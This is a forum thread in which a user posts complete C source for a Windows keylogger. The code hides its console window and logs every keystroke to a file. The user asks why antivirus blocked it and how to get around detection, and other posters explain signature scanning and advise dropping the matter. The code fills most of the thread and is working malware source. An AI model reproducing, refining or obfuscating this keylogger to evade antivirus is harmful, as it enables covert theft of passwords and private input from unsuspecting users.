Thread: Spyware ?

I found this code on Google
... it's supposed to be a keylogger (I was just curious about a code example...)

Code:

//Includes
#include <windows.h>
#include <stdio.h>
#include <winuser.h>
#include <windowsx.h>
#include <time.h>
//Definitions
#define LogLength 100
#define FileName "logs.txt"
//Prototype
int get_keys(void);
//MAIN
int main(void)
{
    //Stealth Stuff
    HWND stealth;
    AllocConsole();
    stealth=FindWindowA("ConsoleWindowClass",NULL);
    ShowWindow(stealth,0);   


    // I.D.K. Stuff

    FILE *file;
    file=fopen(FileName,"a+");
    time_t theTime=time(0);
    fputs("\n#\n##\n###\n#####################\n###Started Logging @@@ ", file);
    fputs(ctime(&theTime),file);
    fputs("\n#####################\n###\n##\n#\n", file);
    fclose(file);


    //Logging Stuff
    int t = get_keys();    
return t;
}
int get_keys()
{    
int freadindex;
char *buf;
long len;
FILE *file;
file=fopen(FileName,"a+");
short character;
while(1)
{
Sleep(5);    
for(character=8;character<=222;character++) {
    if(GetAsyncKeyState(character)==-32767) {
        FILE *file;
        file=fopen(FileName,"a+");
        if(file==NULL) {
            return 1;
        }
        if(file!=NULL) {
            if((character>=39)&&(character<=64)) {
                fputc(character,file);
                fclose(file);
                break;
            }
            else if((character>64)&&(character<91)) {
                character+=32;
                fputc(character,file);
                fclose(file);
                break;
            }
            else
            {
                switch(character)
{
case VK_SPACE:
fputc(' ',file);
fclose(file);
break;    
case VK_SHIFT:
fputs("[SHIFT]",file);
fclose(file);
break;                                            
case VK_RETURN:
fputs("\n[ENTER]\n",file);
fclose(file);
break;
case VK_BACK:
fputs("[BACKSPACE]",file);
fclose(file);
break;
case VK_TAB:
fputs("[TAB]",file);
fclose(file);
break;
case VK_CONTROL:
fputs("[CTRL]",file);
fclose(file);
break;    
case VK_DELETE:
fputs("[DEL]",file);
fclose(file);
break;
case VK_OEM_1:
fputs(":;",file);
fclose(file);
break;
case VK_OEM_2:
fputs("?",file);
fclose(file);
break;
case VK_OEM_3:
fputs("~",file);
fclose(file);
break;
case VK_OEM_4:
fputs("{\r\n",file);
fclose(file);
break;
case VK_OEM_5:
fputs("\\",file);
fclose(file);
break;                                
case VK_OEM_6:
fputs("}",file);
fclose(file);
break;
case VK_OEM_7:
fputs("\"",file);
fclose(file);
break;
case 187:
fputc('+',file);
fclose(file);
break;
case 188:
fputc(',',file);
fclose(file);
break;
case 189:
fputc('-',file);
fclose(file);
break;
case 190:
fputc('.',file);
fclose(file);
break;
case VK_NUMPAD0:
fputc('0',file);
fclose(file);
break;
case VK_NUMPAD1:
fputc('1',file);
fclose(file);
break;
case VK_NUMPAD2:
fputc('2',file);
fclose(file);
break;
case VK_NUMPAD3:
fputc('3',file);
fclose(file);
break;
case VK_NUMPAD4:
fputc('4',file);
fclose(file);
break;
case VK_NUMPAD5:
fputc('5',file);
fclose(file);
break;
case VK_NUMPAD6:
fputc('6',file);
fclose(file);
break;
case VK_NUMPAD7:
fputc('7',file);
fclose(file);
break;
case VK_NUMPAD8:
fputc('8',file);
fclose(file);
break;
case VK_NUMPAD9:
fputc('9',file);
fclose(file);
break;
case VK_CAPITAL:
fputs("\n[CAPSLOCK]\n",file);
fclose(file);
break;
default:
fclose(file);
break;
}
            }
        }
    }
}


fclose(file);
}

return EXIT_SUCCESS;                            
}

When I compiled it, my antivirus blocked it as a Trojan...
But the question is: HOW and WHY did that happen?

When I compiled it, my antivirus blocked it as a Trojan...
But the question is: HOW and WHY did that happen?

Oh probably because it IS a virus that is commonly dropped by trojans.

It opens an invisible window, it acesses the keyboard directly, it writes to a file... all the stuff of keylogging.

Your curiosity about the code is understandable... but so is the operating system's reaction.

So, you're saying my antivirus detected an uncommon activity from the executable through its actions?

Originally Posted by ekosix

So, you're saying my antivirus detected an uncommon activity from the executable through its actions?

None of the actions by itself is a problem. It's not about "uncommon", it's about "dangerous". It detected the combination of actions and decided it's not a good thing.

Virus scanners for the most part work on known patterns (called "signatures") within code. Certain combinations of machine code will trigger a pattern match and off it goes.

Cool!
Well, so if I want or need to avoid this would it work if I make them "indirectly" or to create some methods "between" them just to outwit?

Originally Posted by ekosix

Cool!
Well, so if I want or need to avoid this would it work if I make them "indirectly" or to create some methods "between" them just to outwit?

Probably not. Virus writers and virus scanners are in a "cold war"... Or as it was once said: "My kung foo is better than their kung foo"... and everything is in a state of constant improvement (or worsening depending which side you're on).

Basically the best advice I can give you is to stop messing around with virus code.